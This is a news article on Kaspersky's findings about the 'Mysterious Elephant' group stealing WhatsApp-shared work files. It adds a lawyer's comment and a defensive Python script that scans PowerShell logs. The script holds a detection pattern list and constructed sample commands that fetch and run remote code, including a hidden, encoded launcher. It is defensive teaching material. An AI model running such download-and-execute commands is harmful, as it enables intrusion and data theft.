San José, Costa Rica – The convenience of using WhatsApp to share work documents has opened a dangerous new front in corporate espionage. A recent investigation by global cybersecurity firm Kaspersky has uncovered a sophisticated campaign by an advanced persistent threat (APT) group, dubbed “Mysterious Elephant,” which abuses this common practice to steal sensitive institutional information from both private companies and government entities.
The threat does not lie within WhatsApp’s servers or its end-to-end encryption, which protects messages only while they are in transit. Instead, attackers are targeting the weakest link in the security chain: the user’s computer, where every received file is stored in the clear. By compromising employee workstations, these malicious actors gain access to the treasure trove of files—documents, spreadsheets, images, and archives—that are regularly sent and received through WhatsApp Desktop or its web-based counterpart.
To understand the legal ramifications and the crucial responsibilities businesses face in this digital landscape, we consulted with Lic. Larry Hans Arroyo Vargas, a specialist from the prestigious firm Bufete de Costa Rica.
In Costa Rica, cybersecurity is no longer just an IT issue; it’s a fundamental legal and fiduciary duty. Corporate directors and managers can be held personally liable for negligence if they fail to implement adequate security measures. Proactive investment in robust cyber defense and data protection protocols is not merely an operational expense, but a critical component of corporate governance and risk management to protect both company assets and client trust.
Lic. Larry Hans Arroyo Vargas, Attorney at Law, Bufete de Costa Rica
This perspective powerfully reframes the issue, moving cybersecurity from a departmental concern to a fundamental boardroom responsibility with direct legal and fiduciary consequences. We extend our gratitude to Lic. Larry Hans Arroyo Vargas for his invaluable clarification on this critical aspect of modern corporate governance.
This method of data exfiltration represents a significant threat, as it bypasses traditional corporate security channels. The consequences of such a breach are severe, leading to compromised security protocols, reputational damage, significant financial losses, and a long-term erosion of client and public trust that can be incredibly difficult to rebuild.
According to Kaspersky’s Global Research and Analysis Team (GReAT), which identified the campaign in early 2025, Mysterious Elephant’s initial point of entry is often a meticulously crafted spear-phishing email. These deceptive messages carry malicious documents designed to trick an employee into opening them; doing so triggers the download of a malicious payload onto the machine. This single act of human error provides the attackers with the foothold they need to begin their silent infiltration.
Once inside, the group employs a combination of custom-built tools and modified open-source components to evade detection. They leverage PowerShell, a legitimate and powerful scripting tool present on every modern Windows system, to execute commands and download additional malware without triggering standard antivirus alarms. This “living off the land” technique makes their activity look like routine system administration, allowing them to operate under the radar unless the commands PowerShell actually runs are logged and reviewed.
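As an added illustration of what “living off the land” PowerShell looks like to a defender (this is example code written for this article, not Kaspersky’s tooling or anything recovered from the campaign), the script below scans log text of the kind Windows records when PowerShell script-block logging (Event ID 4104) and process-creation auditing (Event ID 4688) are enabled. It flags the download-and-execute pattern described above (a web fetch combined with in-memory execution, or a hidden, encoded launcher) and decodes `-EncodedCommand` arguments, which are base64 over UTF-16LE, so that indicators hidden inside them are also matched. All log records, hostnames and addresses are constructed for the example; the indicator list and scoring rule are the author’s assumptions, not a published detection.

```python
"""Added example: flag PowerShell "living off the land" download/execute patterns
in constructed log records. Not Kaspersky's detection logic."""
import base64
import re
from dataclasses import dataclass, field
from typing import Optional

# Indicator patterns grouped by what they tell the analyst. Case-insensitive
# because PowerShell is. These groupings are this example's assumption.
INDICATORS = {
    "download": [
        r"Net\.WebClient", r"\.Download(?:String|File|Data)\(",
        r"\bInvoke-WebRequest\b", r"\biwr\b", r"\bInvoke-RestMethod\b", r"\birm\b",
        r"\bStart-BitsTransfer\b", r"\bcurl\b", r"\bwget\b",
    ],
    "execute": [r"\bIEX\b", r"\bInvoke-Expression\b", r"\bStart-Process\b"],
    "evasion": [
        r"-w(?:indowstyle)?\s+hidden", r"-nop\b", r"-noprofile\b",
        r"-e(?:xecutionpolicy|p)\s+bypass", r"-e(?:c|n[a-z]*)?\s+[A-Za-z0-9+/=]{16,}",
    ],
}
COMPILED = {k: [re.compile(p, re.IGNORECASE) for p in v] for k, v in INDICATORS.items()}

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENC_RE = re.compile(r"(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def decode_encoded_command(text: str) -> Optional[str]:
    """Return the cleartext of a -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = ENC_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


@dataclass
class Finding:
    record: int
    event_id: int
    indicators: dict = field(default_factory=dict)  # category -> matched patterns
    decoded: Optional[str] = None

    @property
    def suspicious(self) -> bool:
        # A lone download cmdlet may be legitimate admin work. Two indicator
        # categories together (fetch + execute, or fetch + hidden window), or
        # any encoded command line, is the shape described in the article.
        return len(self.indicators) >= 2 or self.decoded is not None


def analyze_event(record: int, event_id: int, text: str) -> Finding:
    """Match indicators against the logged text plus any decoded -EncodedCommand payload."""
    finding = Finding(record=record, event_id=event_id)
    finding.decoded = decode_encoded_command(text)
    haystack = text if finding.decoded is None else text + "\n" + finding.decoded
    for category, patterns in COMPILED.items():
        hits = [p.pattern for p in patterns if p.search(haystack)]
        if hits:
            finding.indicators[category] = hits
    return finding


def encode_ps_command(cleartext: str) -> str:
    """Used only to build the constructed sample; mirrors how -EncodedCommand values are produced."""
    return base64.b64encode(cleartext.encode("utf-16-le")).decode("ascii")


# Constructed sample records (record number, Windows event ID, logged text).
# 4104 carries ScriptBlockText; 4688 carries the process command line.
SAMPLE_EVENTS = [
    (1, 4104, "Get-ChildItem C:\\Users\\*\\Documents | Measure-Object"),
    (2, 4104, "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/stage2.ps1')"),
    (3, 4688, "powershell.exe -nop -w hidden -enc "
              + encode_ps_command("Invoke-WebRequest http://198.51.100.7/p.bin -OutFile $env:TEMP\\p.bin")),
    (4, 4104, "Get-Service | Where-Object Status -eq 'Running'"),
]


def scan(events=SAMPLE_EVENTS):
    """Return only the suspicious findings for a batch of (record, event_id, text) tuples."""
    return [f for f in (analyze_event(*e) for e in events) if f.suspicious]


if __name__ == "__main__":
    for f in scan():
        print(f"record {f.record} (event {f.event_id}): {sorted(f.indicators)}")
        if f.decoded:
            print("  decoded -EncodedCommand:", f.decoded)
```

Run as-is it reports records 2 and 3 and leaves the two ordinary administrative commands alone; the point is that the “invisible” technique becomes visible once script-block and command-line logging exist to be searched. In a real deployment the patterns would be tuned against the organisation’s own baseline to control false positives.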
A key weapon in their arsenal is a remote access tool known as “BabShell,” which establishes a backdoor into the compromised system. This gives the attackers remote control to monitor activity, collect basic system data, and deploy further malicious instructions. For maximum stealth, they also use a program called “MemLoader HidenDesk,” which executes harmful code directly in memory, leaving little on the hard drive for a disk-based forensic investigation to find.
The operation of this group is designed to go unnoticed and remain active even when attempts are made to stop it. The real risk lies in the loss of control and visibility over the institution’s digital environment, especially when everyday channels, such as messaging applications, are exploited to extract information without raising suspicion.
Fabio Assolini, Director of Research and Analysis for Latin America at Kaspersky
The long-term danger is that these attackers can remain dormant within a network for extended periods, methodically collecting login credentials, mapping the internal infrastructure, and quietly siphoning sensitive files. To counter this growing threat, Kaspersky experts recommend a multi-layered defense strategy. This includes establishing strict corporate policies that prohibit the sharing of confidential information on non-corporate channels, reinforcing email security with advanced anti-phishing filters, and fostering a robust security culture through regular employee training. Finally, using proactive threat intelligence can provide organizations with the contextual data needed to anticipate and neutralize these attacks before they cause irreversible damage.
For further information, visit kaspersky.com
About Kaspersky:
Kaspersky is a global cybersecurity and digital privacy company founded in 1997. Its deep threat intelligence and security expertise are constantly transformed into innovative security solutions and services to protect businesses, critical infrastructure, governments and consumers around the globe. The company’s comprehensive security portfolio includes leading endpoint protection and a number of specialized security solutions and services to fight sophisticated and evolving digital threats.
For further information, visit bufetedecostarica.com
About Bufete de Costa Rica:
As a leading legal institution, Bufete de Costa Rica is built upon a bedrock of unwavering integrity and a relentless pursuit of professional excellence. The firm consistently pushes the boundaries of legal practice through innovative strategies while serving a diverse clientele. Beyond its professional services, it demonstrates a profound commitment to societal progress by actively working to demystify complex legal concepts and empower the community with accessible knowledge.